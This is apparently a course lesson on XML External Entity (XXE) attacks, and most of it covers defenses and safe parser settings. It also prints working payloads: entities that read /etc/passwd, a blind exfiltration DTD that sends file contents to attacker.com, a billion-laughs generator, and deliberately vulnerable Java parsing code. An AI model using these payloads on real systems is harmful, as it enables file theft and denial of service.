07.04 · OWASP A4:2017 / A05:2021 (Security Misconfiguration)

XML External Entities

XML has a feature, declared in the spec in 1998 and still on by default in many parsers, where a document can reference an external file and embed its contents. The feature was meant for document modularity. Attackers use it to read /etc/passwd.

What XML actually does

An XML document can declare its own internal abbreviations, called entities. The famous ones are &lt;, &amp;, &gt;. You can declare your own too:

    <!DOCTYPE doc [
      <!ENTITY company "Heliotrope Defense Systems">
    ]>
    <doc>&company; was founded in 1947.</doc>

parses as: "Heliotrope Defense Systems was founded in 1947."
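The expansion above can be reproduced with Python's standard library. This is a minimal sketch, assuming the stock xml.etree.ElementTree parser, which expands entities declared inside the document itself; the variable names are illustrative only.

```python
import xml.etree.ElementTree as ET

# The same document as above, with the entity declared in the internal DTD subset.
document = (
    '<!DOCTYPE doc [ <!ENTITY company "Heliotrope Defense Systems"> ]>'
    "<doc>&company; was founded in 1947.</doc>"
)

# The parser substitutes &company; before the application ever sees the text.
root = ET.fromstring(document)
print(root.text)  # Heliotrope Defense Systems was founded in 1947.
```

The application code never asked for a substitution; the parser did it on the document's instructions. That is the property the external variant abuses.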

Useful. What makes it dangerous is the external variant — entities that reference a URL or file path. The parser fetches the target and substitutes the result inline.

    <!DOCTYPE doc [
      <!ENTITY xxe SYSTEM "file:///etc/passwd">
    ]>
    <doc>&xxe;</doc>

A vulnerable parser inlines /etc/passwd into the document.

The application then echoes the parsed document back somewhere — into an error message, a converted PDF, a generated thumbnail, a debug log. The attacker has read a server file through a feature that was never supposed to be a vulnerability.

Three variants

07.04.A

In-band (classic)

The parsed document is echoed back in the response. Attacker reads /etc/passwd and sees it returned in the API response or rendered PDF. Easiest to exploit; loudest in logs.

07.04.B

Blind (out-of-band)

No echo, but the parser still resolves external entities. Attacker hosts a malicious DTD that exfiltrates the file contents via an HTTP request to an attacker-controlled server. Slower, but the file contents still leave the server.

07.04.C

SSRF / DoS variant

External entity points at internal-only URLs (cloud metadata, internal admin panels, intranet). Or uses the billion-laughs entity expansion attack to consume memory until the parser dies.
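The arithmetic behind the entity expansion attack is worth writing out. The sketch below assumes the classic layout: one seed entity holding "lol", then nine further levels that each reference the previous level ten times. The function names are invented for this illustration, and the payload is only built as a string, never parsed.

```python
def billion_laughs(levels: int = 9, fanout: int = 10, seed: str = "lol") -> str:
    """Build the nested-entity document as text. Nothing here parses it."""
    decls = [f'<!ENTITY lol0 "{seed}">']
    for i in range(1, levels + 1):
        # Each level is just `fanout` references to the level below it.
        refs = f"&lol{i - 1};" * fanout
        decls.append(f'<!ENTITY lol{i} "{refs}">')
    body = "\n  ".join(decls)
    return f"<!DOCTYPE lolz [\n  {body}\n]>\n<lolz>&lol{levels};</lolz>"


def expanded_size(levels: int = 9, fanout: int = 10, seed: str = "lol") -> int:
    """Characters produced if a parser fully expands the top-level entity."""
    return len(seed) * fanout ** levels


payload = billion_laughs()
print(len(payload) < 1000)   # True: the document on the wire is tiny
print(expanded_size())       # 3000000000 characters after full expansion
```

A request body of under a thousand characters turns into roughly three billion characters of text in memory. Note that this variant needs no external entity at all, so a parser that only blocks external resolution still needs an expansion limit or a DOCTYPE ban.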

Anatomy of an attack

The app accepts an XML upload — an invoice, a SAML assertion, an Office document, an SVG. The user controls the XML payload. The parser is configured with defaults from 2005.

1. Attacker's payload [vulnerable]

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE invoice [
      <!ENTITY leak SYSTEM "file:///etc/passwd">
    ]>
    <invoice>
      <customer>&leak;</customer>
      <amount>0</amount>
    </invoice>

2. Server-side parse (Java, defaults) [vulnerable]

    // vulnerable: default DocumentBuilderFactory honors external entities
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
    DocumentBuilder builder = factory.newDocumentBuilder();
    Document doc = builder.parse(uploadedXml);
    String customer = doc.getElementsByTagName("customer").item(0).getTextContent();
    log.info("Invoice from {}", customer); // logs /etc/passwd contents

3. The log file (or response, or rendered PDF) [leaked]

    Invoice from root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    ...

The blind variant — out-of-band exfiltration

The application doesn't echo the parsed value. Doesn't matter. Attacker hosts http://attacker.com/evil.dtd with a parameter entity that does the work:

Payload sent to the vulnerable endpoint:

    <!DOCTYPE r [
      <!ENTITY % ext SYSTEM "http://attacker.com/evil.dtd">
      %ext;
    ]>
    <r>&send;</r>

Contents of evil.dtd, hosted by the attacker:

    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % wrap "<!ENTITY send SYSTEM 'http://attacker.com/?d=%file;'>">
    %wrap;

The parser fetches evil.dtd, which makes it read /etc/passwd and embed it in a new entity that points at the attacker's logger. The contents arrive in the attacker's web logs as a query parameter. No response from the vulnerable app needed.

Defenses

Disable external entities — the only real fix

Every major XML parser has a flag for this. Set it.

Java · DocumentBuilderFactory [safe]

    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
    factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
    factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    factory.setXIncludeAware(false);
    factory.setExpandEntityReferences(false);

Python · defusedxml [safe]

    # pip install defusedxml. This is the answer for Python.
    # Drop-in replacement for ElementTree, with the dangerous bits turned off.
    from defusedxml.ElementTree import parse

    # Raises a DefusedXmlException subclass (EntitiesForbidden) as soon as the
    # document declares an entity. Pass forbid_dtd=True to reject any DOCTYPE too.
    tree = parse(uploaded_xml)

.NET · XmlReader settings [safe]

    var settings = new XmlReaderSettings();
    settings.DtdProcessing = DtdProcessing.Prohibit; // the important one
    settings.XmlResolver = null;
    using (var reader = XmlReader.Create(uploadedXml, settings)) { ... }

PHP · libxml [safe]

    // Before PHP 8.0: disable external entity loading process-wide.
    libxml_disable_entity_loader(true);
    // Deprecated in PHP 8.0, where external entity loading is off by default.
    // On PHP 8+: do not pass LIBXML_NOENT (it turns entity substitution on),
    // and avoid LIBXML_DTDLOAD.
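
Where defusedxml cannot be installed, the same "refuse any DOCTYPE" policy can be approximated with Python's standard library. The following is a minimal sketch, assuming uploads small enough to hold in memory. The names parse_without_doctype and DoctypeForbidden are invented for this example and are not part of any library.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when an uploaded document contains a DOCTYPE declaration."""


def parse_without_doctype(xml_bytes: bytes) -> ET.Element:
    """Parse XML, rejecting any document that declares a DOCTYPE."""

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        raise DoctypeForbidden(f"DOCTYPE not allowed (declared root: {name!r})")

    # First pass: a bare expat parser whose only job is to trip on a DOCTYPE.
    guard = expat.ParserCreate()
    guard.StartDoctypeDeclHandler = reject_doctype
    guard.Parse(xml_bytes, True)

    # Second pass: with no DOCTYPE there are no custom entity declarations,
    # so an ordinary ElementTree parse has nothing dangerous to expand.
    return ET.fromstring(xml_bytes)


invoice = parse_without_doctype(b"<invoice><amount>0</amount></invoice>")
print(invoice.find("amount").text)  # 0
```

Parsing twice is a deliberate trade: it costs some CPU but keeps the guard separate from whatever parser the application already uses. Rejecting the DOCTYPE outright also covers the entity expansion DoS, which blocking external entities alone does not.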

Other layers

  • Prefer JSON. Most modern APIs don't need XML at all. If you can refuse XML uploads, refuse them.
  • WAF rules can catch <!ENTITY and SYSTEM in request bodies, but parser config is the real fix — the WAF is a tripwire, not a wall.
  • Watch for SAML and Office docs. Both are XML under the hood. SAML responses, in particular, were a recurring XXE vector for years.
  • Sandbox the parsing process. No outbound network. Read-only access to a minimal filesystem. If the parser is compromised, the blast radius is small.

The takeaway

XXE is the cleanest example of a feature that became a vulnerability. Nobody using an XML invoice API in 2025 wants their parser to fetch external URLs. But the XML 1.0 spec from 1998 enabled it, parsers shipped with it on, and more than twenty-five years later the bug is still found in fresh code. Disable external entities in every XML parser you initialize. Prefer JSON for new APIs. Treat XML upload endpoints as high-value defensive targets.
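
One way to keep the "disable it everywhere" rule from regressing is a canary test: plant a marker in a temporary file, point an external entity at it, and check that the marker never comes back out of the parsing code. The sketch below is one possible shape for such a test, not a complete harness. All function names are hypothetical, and toy_vulnerable_parse is a deliberately naive stand-in for a misconfigured parser, included only to show the canary firing.

```python
import re
import tempfile
import urllib.request
import xml.etree.ElementTree as ET
from pathlib import Path

CANARY = "xxe-canary-7f3a"  # arbitrary marker string chosen for this sketch


def leaks_canary(parse_text) -> bool:
    """Return True if parse_text() exposes a local file via an external entity."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = Path(tmp) / "secret.txt"
        secret.write_text(CANARY)
        payload = (
            f'<!DOCTYPE doc [<!ENTITY xxe SYSTEM "{secret.as_uri()}">]>'
            "<doc>&xxe;</doc>"
        )
        try:
            return CANARY in parse_text(payload)
        except Exception:
            # Rejecting the document outright counts as not leaking.
            return False


def stdlib_parse(xml_text: str) -> str:
    """Parser under test: ElementTree, which does not resolve external entities."""
    return ET.fromstring(xml_text).text or ""


def toy_vulnerable_parse(xml_text: str) -> str:
    """Hypothetical stand-in for a misconfigured parser: inlines SYSTEM entities."""
    for name, uri in re.findall(r'<!ENTITY (\w+) SYSTEM "([^"]+)">', xml_text):
        with urllib.request.urlopen(uri) as fh:
            xml_text = xml_text.replace(f"&{name};", fh.read().decode())
    return xml_text


print(leaks_canary(toy_vulnerable_parse))  # True
print(leaks_canary(stdlib_parse))          # False
```

In a real suite, stdlib_parse would be replaced by the application's own parsing entry point, so the test fails the day someone swaps in a parser with unsafe defaults. The broad except is a simplification; a stricter test would assert on the specific rejection error.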

OWASP standing

XXE had its own slot in the OWASP Top 10 (2017): A4, XML External Entities. In the 2021 refresh, OWASP folded XXE into the broader A05:2021 Security Misconfiguration category. The bug class hasn't gone away; it's just classified differently.

Notable real incidents: Facebook (2014, $33,500 bounty); Apple iCloud authentication endpoint (2017, via SAML). Apache Struts CVE-2017-5638, used in the Equifax breach, often appears on lists like this one, but that bug was OGNL injection rather than XXE. XXE keeps turning up in high-profile, well-defended systems.

What to remember

  • Many XML parsers ship with a "fetch arbitrary URLs" feature on by default. Most code doesn't need it. Turn it off.
  • The attack surface is wherever XML is parsed: SOAP endpoints, SAML assertions, SVG uploads, DOCX/XLSX/PPTX (zip + XML), config files, RSS feeds, OPML imports, XML-RPC.
  • The damage is read-file, SSRF, DoS, and occasionally RCE via interaction with other parsers (the PHP expect:// wrapper, for example).
  • defusedxml in Python, settings flags in Java/.NET/PHP, libxml prohibitions everywhere else. The fix is a few lines.
  • Modernize. If the API can speak JSON, retire the XML endpoint. Bug class extinguished.
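
Office documents deserve a concrete illustration, since the XML is hidden inside a zip container. A legitimate DOCX, XLSX, or PPTX part has no reason to carry a DOCTYPE, so a cheap pre-check can flag archives that do. The sketch below is a naive tripwire under stated assumptions: it matches raw bytes, so it would miss UTF-16 encoded parts, and it reads each member fully without a size cap. The function name is invented for this example.

```python
import io
import zipfile


def parts_with_doctype(archive_bytes: bytes) -> list[str]:
    """List the XML members of a zip-based document that contain a DOCTYPE."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for info in zf.infolist():
            # Office formats keep their XML in .xml and .rels members.
            if not info.filename.endswith((".xml", ".rels")):
                continue
            if b"<!DOCTYPE" in zf.read(info):
                flagged.append(info.filename)
    return flagged
```

A non-empty result is a reason to reject the upload before any XML parser touches it. As with the WAF rule, this is a tripwire; the parser configuration remains the actual fix.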

References

Formatted in APA 7.

  1. OWASP. (2017). A4:2017 — XML External Entities (XXE). OWASP Top 10. https://owasp.org/www-project-top-ten/2017/A4_2017-XML_External_Entities_(XXE)
  2. OWASP. (2024). XML External Entity (XXE) prevention cheat sheet. OWASP Cheat Sheet Series. https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
  3. Python Software Foundation. (2024). XML processing modules: XML vulnerabilities. Python 3 documentation. https://docs.python.org/3/library/xml.html#xml-vulnerabilities
  4. MITRE. (2024). CWE-611: Improper restriction of XML external entity reference. Common Weakness Enumeration. https://cwe.mitre.org/data/definitions/611.html